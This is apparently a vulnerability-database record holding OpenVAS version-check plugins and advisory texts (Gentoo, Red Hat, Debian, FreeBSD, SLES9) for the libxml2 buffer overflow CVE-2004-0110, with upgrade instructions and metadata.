ID OPENVAS:54526 Type openvas Reporter Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com Modified 2017-07-07T00:00:00
Description
The remote host is missing updates announced in
advisory GLSA 200403-01.
# OpenVAS Vulnerability Test
# $
# Description: Auto generated from Gentoo's XML based advisory
#
# Authors:
# Thomas Reinke <reinke@securityspace.com>
#
# Copyright:
# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com
# Text descriptions are largely excerpted from the referenced
# advisories, and are Copyright (c) the respective author(s)
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2,
# as published by the Free Software Foundation
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
#
include("revisions-lib.inc");
tag_insight = "A buffer overflow has been discovered in libxml2 versions prior to 2.6.6
which may be exploited by an attacker allowing the execution of arbitrary
code.";
tag_solution = "All users are recommended to upgrade their libxml2 installation:
# emerge sync
# emerge -pv '>=dev-libs/libxml2-2.6.6'
# emerge '>=dev-libs/libxml2-2.6.6'
http://www.securityspace.com/smysecure/catid.html?in=GLSA%20200403-01
http://bugs.gentoo.org/show_bug.cgi?id=42735";
tag_summary = "The remote host is missing updates announced in
advisory GLSA 200403-01.";
if(description)
{
script_id(54526);
script_version("$Revision: 6596 $");
script_tag(name:"last_modification", value:"$Date: 2017-07-07 11:21:37 +0200 (Fri, 07 Jul 2017) $");
script_tag(name:"creation_date", value:"2008-09-24 21:14:03 +0200 (Wed, 24 Sep 2008)");
script_bugtraq_id(9718);
script_cve_id("CVE-2004-0110");
script_tag(name:"cvss_base", value:"7.5");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:P/I:P/A:P");
script_name("Gentoo Security Advisory GLSA 200403-01 (libxml)");
script_category(ACT_GATHER_INFO);
script_copyright("Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com");
script_family("Gentoo Local Security Checks");
script_dependencies("gather-package-list.nasl");
script_mandatory_keys("ssh/login/gentoo", "ssh/login/pkg");
script_tag(name : "insight" , value : tag_insight);
script_tag(name : "solution" , value : tag_solution);
script_tag(name : "summary" , value : tag_summary);
script_tag(name:"qod_type", value:"package");
script_tag(name:"solution_type", value:"VendorFix");
exit(0);
}
#
# The script code starts here
#
include("pkg-lib-gentoo.inc");
res = "";
report = "";
if ((res = ispkgvuln(pkg:"dev-libs/libxml2", unaffected: make_list("ge 2.6.6"), vulnerable: make_list("lt 2.6.6"))) != NULL) {
report += res;
}
if (report != "") {
security_message(data:report);
} else if (__pkg_match) {
exit(99); # Not vulnerable.
}
{"id": "OPENVAS:54526", "type": "openvas", "bulletinFamily": "scanner", "title": "Gentoo Security Advisory GLSA 200403-01 (libxml)", "description": "The remote host is missing updates announced in\nadvisory GLSA 200403-01.", "published": "2008-09-24T00:00:00", "modified": "2017-07-07T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "http://plugins.openvas.org/nasl.php?oid=54526", "reporter": "Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com", "references": [], "cvelist": ["CVE-2004-0110"], "lastseen": "2017-07-24T12:50:09", "viewCount": 1, "enchantments": {"score": {"value": 7.6, "vector": "NONE", "modified": "2017-07-24T12:50:09", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2004-0110"]}, {"type": "freebsd", "idList": ["847ADE05-6717-11D8-B321-000A95BC6FAE"]}, {"type": "nessus", "idList": ["CENTOS_RHSA-2004-650.NASL", "SUSE9_9579.NASL", "GENTOO_GLSA-200403-01.NASL", "REDHAT-RHSA-2004-090.NASL", "FREEBSD_XML2_266.NASL", "FREEBSD_PKG_847ADE05671711D8B321000A95BC6FAE.NASL", "DEBIAN_DSA-455.NASL", "MANDRAKE_MDKSA-2004-018.NASL", "SUSE9_9581.NASL", "REDHAT-RHSA-2004-650.NASL"]}, {"type": "redhat", "idList": ["RHSA-2004:650", "RHSA-2004:090"]}, {"type": "openvas", "idList": ["OPENVAS:136141256231065564", "OPENVAS:64701", "OPENVAS:65533", "OPENVAS:64702", "OPENVAS:136141256231064701", "OPENVAS:53153", "OPENVAS:136141256231065533", "OPENVAS:136141256231064702", "OPENVAS:52513", "OPENVAS:65564"]}, {"type": "debian", "idList": ["DEBIAN:DSA-455-1:D91F9"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:5830"]}, {"type": "gentoo", "idList": ["GLSA-200403-01"]}, {"type": "osvdb", "idList": ["OSVDB:4032", "OSVDB:4033"]}, {"type": "exploitdb", "idList": ["EDB-ID:601"]}, {"type": "cert", "idList": ["VU:493966"]}, {"type": "centos", "idList": ["CESA-2004:650"]}], "modified": "2017-07-24T12:50:09", "rev": 2}, "vulnersScore": 7.6}, "pluginID": "54526", "sourceData": "# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A buffer overflow has been discovered in libxml2 versions prior to 2.6.6\nwhich may be exploited by an attacker allowing the execution of arbitrary\ncode.\";\ntag_solution = \"All users are recommended to upgrade their libxml2 installation:\n\n # emerge sync\n # emerge -pv '>=dev-libs/libxml2-2.6.6'\n # emerge '>=dev-libs/libxml2-2.6.6'\n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20200403-01\nhttp://bugs.gentoo.org/show_bug.cgi?id=42735\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 200403-01.\";\n\n \n\nif(description)\n{\n script_id(54526);\n script_version(\"$Revision: 6596 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:21:37 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-24 21:14:03 +0200 (Wed, 24 Sep 2008)\");\n script_bugtraq_id(9718);\n script_cve_id(\"CVE-2004-0110\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Gentoo Security Advisory GLSA 200403-01 (libxml)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = ispkgvuln(pkg:\"dev-libs/libxml2\", unaffected: make_list(\"ge 2.6.6\"), vulnerable: make_list(\"lt 2.6.6\"))) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "naslFamily": "Gentoo Local Security Checks"}
{"cve": [{"lastseen": "2021-02-02T05:22:57", "description": "Buffer overflow in the (1) nanohttp or (2) nanoftp modules in XMLSoft Libxml 2 (Libxml2) 2.6.0 through 2.6.5 allow remote attackers to execute arbitrary code via a long URL.", "edition": 4, "cvss3": {}, "published": "2004-03-15T05:00:00", "title": "CVE-2004-0110", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2004-0110"], "modified": "2017-10-11T01:29:00", "cpe": ["cpe:/a:sgi:propack:2.4", "cpe:/a:xmlsoft:libxml2:2.5.10", "cpe:/a:xmlsoft:libxml2:2.6.2", "cpe:/a:xmlsoft:libxml2:2.5.4", "cpe:/a:xmlsoft:libxml2:2.5.11", "cpe:/a:xmlsoft:libxml2:2.6.3", "cpe:/a:xmlsoft:libxml2:2.6.1", "cpe:/a:sgi:propack:2.3", "cpe:/a:xmlsoft:libxml2:2.4.23", "cpe:/a:xmlsoft:libxml:1.8.17", "cpe:/a:xmlsoft:libxml2:2.4.19", "cpe:/a:xmlsoft:libxml2:2.6.5", "cpe:/a:xmlsoft:libxml2:2.6.4", "cpe:/a:xmlsoft:libxml2:2.6.0"], "id": "CVE-2004-0110", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0110", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:xmlsoft:libxml2:2.6.4:*:*:*:*:*:*:*", "cpe:2.3:a:xmlsoft:libxml:1.8.17:*:*:*:*:*:*:*", "cpe:2.3:a:xmlsoft:libxml2:2.6.5:*:*:*:*:*:*:*", "cpe:2.3:a:xmlsoft:libxml2:2.5.11:*:*:*:*:*:*:*", "cpe:2.3:a:xmlsoft:libxml2:2.6.0:*:*:*:*:*:*:*", "cpe:2.3:a:sgi:propack:2.3:*:*:*:*:*:*:*", "cpe:2.3:a:xmlsoft:libxml2:2.4.19:*:*:*:*:*:*:*", "cpe:2.3:a:xmlsoft:libxml2:2.5.4:*:*:*:*:*:*:*", "cpe:2.3:a:xmlsoft:libxml2:2.6.2:*:*:*:*:*:*:*", "cpe:2.3:a:xmlsoft:libxml2:2.5.10:*:*:*:*:*:*:*", "cpe:2.3:a:xmlsoft:libxml2:2.6.1:*:*:*:*:*:*:*", "cpe:2.3:a:xmlsoft:libxml2:2.4.23:*:*:*:*:*:*:*", "cpe:2.3:a:xmlsoft:libxml2:2.6.3:*:*:*:*:*:*:*", "cpe:2.3:a:sgi:propack:2.4:*:*:*:*:*:*:*"]}], "redhat": [{"lastseen": "2019-08-13T18:47:09", "bulletinFamily": "unix", "cvelist": ["CVE-2004-0110"], "description": "libxml2 is a library for manipulating XML files.\n\nYuuichi Teranishi discovered a flaw in libxml2 versions prior to 2.6.6. \nWhen fetching a remote resource via FTP or HTTP, libxml2 uses special\nparsing routines. These routines can overflow a buffer if passed a very\nlong URL. If an attacker is able to find an application using libxml2 that\nparses remote resources and allows them to influence the URL, then this\nflaw could be used to execute arbitrary code. The Common Vulnerabilities\nand Exposures project (cve.mitre.org) has assigned the name CAN-2004-0110\nto this issue.\n\nAll users are advised to upgrade to these updated packages, which contain a\nbackported fix and are not vulnerable to this issue.", "modified": "2018-05-11T23:27:02", "published": "2004-02-26T05:00:00", "id": "RHSA-2004:090", "href": "https://access.redhat.com/errata/RHSA-2004:090", "type": "redhat", "title": "(RHSA-2004:090) libxml2 security update", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-08-13T18:45:08", "bulletinFamily": "unix", "cvelist": ["CVE-2004-0110", "CVE-2004-0989"], "description": "The libxml package contains a library for manipulating XML files.\r\n\r\nMultiple buffer overflow bugs have been found in libxml versions prior to\r\n2.6.14. If an attacker can trick a user into passing a specially crafted\r\nFTP URL or FTP proxy URL to an application that uses the vulnerable\r\nfunctions of libxml, it could be possible to execute arbitrary code. \r\nAdditionally, if an attacker can return a specially crafted DNS request to\r\nlibxml, it could be possible to execute arbitrary code. The Common\r\nVulnerabilities and Exposures project (cve.mitre.org) has assigned the name\r\nCAN-2004-0989 to this issue.\r\n\r\nYuuichi Teranishi discovered a flaw in libxml versions prior to 2.6.6.\r\nWhen fetching a remote resource via FTP or HTTP, libxml uses special\r\nparsing routines. These routines can overflow a buffer if passed a very\r\nlong URL. If an attacker is able to find an application using libxml that\r\nparses remote resources and allows them to influence the URL, then this\r\nflaw could be used to execute arbitrary code. The Common Vulnerabilities\r\nand Exposures project (cve.mitre.org) has assigned the name CAN-2004-0110\r\nto this issue.\r\n\r\nAll users are advised to upgrade to this updated package, which contains\r\nbackported patches and is not vulnerable to these issues.", "modified": "2019-03-22T23:43:20", "published": "2004-12-16T05:00:00", "id": "RHSA-2004:650", "href": "https://access.redhat.com/errata/RHSA-2004:650", "type": "redhat", "title": "(RHSA-2004:650) libxml security update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2017-07-02T21:10:12", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0110"], "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "modified": "2016-09-22T00:00:00", "published": "2008-09-04T00:00:00", "id": "OPENVAS:52513", "href": "http://plugins.openvas.org/nasl.php?oid=52513", "type": "openvas", "title": "FreeBSD Ports: libxml2", "sourceData": "#\n#VID 847ade05-6717-11d8-b321-000a95bc6fae\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from vuxml or freebsd advisories\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The following package is affected: libxml2\n\nCVE-2004-0110\nBuffer overflow in the (1) nanohttp or (2) nanoftp modules in XMLSoft\nLibxml2 2.6.0 through 2.6.5 allow remote attackers to execute\narbitrary code via a long URL.\";\ntag_solution = \"Update your system with the appropriate patches or\nsoftware upgrades.\n\nhttp://www.xmlsoft.org/news.html\nhttp://mail.gnome.org/archives/xml/2004-February/msg00070.html\nhttp://www.vuxml.org/freebsd/847ade05-6717-11d8-b321-000a95bc6fae.html\";\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory.\";\n\n\nif(description)\n{\n script_id(52513);\n script_version(\"$Revision: 4128 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2016-09-22 07:37:51 +0200 (Thu, 22 Sep 2016) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-04 20:41:11 +0200 (Thu, 04 Sep 2008)\");\n script_bugtraq_id(9718);\n script_cve_id(\"CVE-2004-0110\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"FreeBSD Ports: libxml2\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdrel\", \"login/SSH/success\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\n\ntxt = \"\";\nvuln = 0;\nbver = portver(pkg:\"libxml2\");\nif(!isnull(bver) && revcomp(a:bver, b:\"2.6.6\")<0) {\n txt += 'Package libxml2 version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\n\nif(vuln) {\n security_message(data:string(txt));\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-24T12:49:46", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0110"], "description": "The remote host is missing an update to libxml, libxml2\nannounced via advisory DSA 455-1.", "modified": "2017-07-07T00:00:00", "published": "2008-01-17T00:00:00", "id": "OPENVAS:53153", "href": "http://plugins.openvas.org/nasl.php?oid=53153", "type": "openvas", "title": "Debian Security Advisory DSA 455-1 (libxml, libxml2)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_455_1.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory DSA 455-1\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largerly excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"libxml2 is a library for manipulating XML files.\n\nYuuichi Teranishi discovered a flaw in libxml, the GNOME XML library.\nWhen fetching a remote resource via FTP or HTTP, the library uses\nspecial parsing routines which can overflow a buffer if passed a very\nlong URL. If an attacker is able to find an application using libxml1\nor libxml2 that parses remote resources and allows the attacker to\ncraft the URL, then this flaw could be used to execute arbitrary code.\n\nFor the stable distribution (woody) this problem has been fixed in\nversion 1.8.17-2woody1 of libxml and version 2.4.19-4woody1 of libxml2.\n\nFor the unstable distribution (sid) this problem has been fixed in\nversion 1.8.17-5 of libxml and version 2.6.6-1 of libxml2.\n\nWe recommend that you upgrade your libxml1 and libxml2 packages.\";\ntag_summary = \"The remote host is missing an update to libxml, libxml2\nannounced via advisory DSA 455-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%20455-1\";\n\nif(description)\n{\n script_id(53153);\n script_version(\"$Revision: 6616 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-01-17 22:41:51 +0100 (Thu, 17 Jan 2008)\");\n script_bugtraq_id(9718);\n script_cve_id(\"CVE-2004-0110\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Debian Security Advisory DSA 455-1 (libxml, libxml2)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"libxml-dev\", ver:\"1.8.17-2woody1\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxml1\", ver:\"1.8.17-2woody1\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxml2\", ver:\"2.4.19-4woody1\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxml2-dev\", ver:\"2.4.19-4woody1\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-04-06T11:40:36", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0110"], "description": "The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n libxml2-devel\n libxml2\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5011202 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/", "modified": "2018-04-06T00:00:00", "published": "2009-10-10T00:00:00", "id": "OPENVAS:136141256231065533", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231065533", "type": "openvas", "title": "SLES9: Security update for libxml2", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: sles9p5011202.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Security update for libxml2\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n libxml2-devel\n libxml2\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5011202 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/\";\n\ntag_solution = \"Please install the updates provided by SuSE.\";\n \nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.65533\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-10 16:11:46 +0200 (Sat, 10 Oct 2009)\");\n script_cve_id(\"CVE-2004-0110\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"SLES9: Security update for libxml2\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse_sles\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"libxml2-devel\", rpm:\"libxml2-devel~2.6.7~28.7\", rls:\"SLES9.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-26T08:56:20", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0110"], "description": "The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n libxml2-devel\n libxml2\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5011202 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/", "modified": "2017-07-11T00:00:00", "published": "2009-10-10T00:00:00", "id": "OPENVAS:65533", "href": "http://plugins.openvas.org/nasl.php?oid=65533", "type": "openvas", "title": "SLES9: Security update for libxml2", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: sles9p5011202.nasl 6666 2017-07-11 13:13:36Z cfischer $\n# Description: Security update for libxml2\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n libxml2-devel\n libxml2\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5011202 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/\";\n\ntag_solution = \"Please install the updates provided by SuSE.\";\n \nif(description)\n{\n script_id(65533);\n script_version(\"$Revision: 6666 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-11 15:13:36 +0200 (Tue, 11 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-10 16:11:46 +0200 (Sat, 10 Oct 2009)\");\n script_cve_id(\"CVE-2004-0110\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"SLES9: Security update for libxml2\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse_sles\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"libxml2-devel\", rpm:\"libxml2-devel~2.6.7~28.7\", rls:\"SLES9.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-04-06T11:39:36", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0110", "CVE-2004-0989"], "description": "The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n libxml\n libxml-devel\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5016394 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/", "modified": "2018-04-06T00:00:00", "published": "2009-10-10T00:00:00", "id": "OPENVAS:136141256231065564", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231065564", "type": "openvas", "title": "SLES9: Security update for libxml", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: sles9p5016394.nasl 9350 2018-04-06 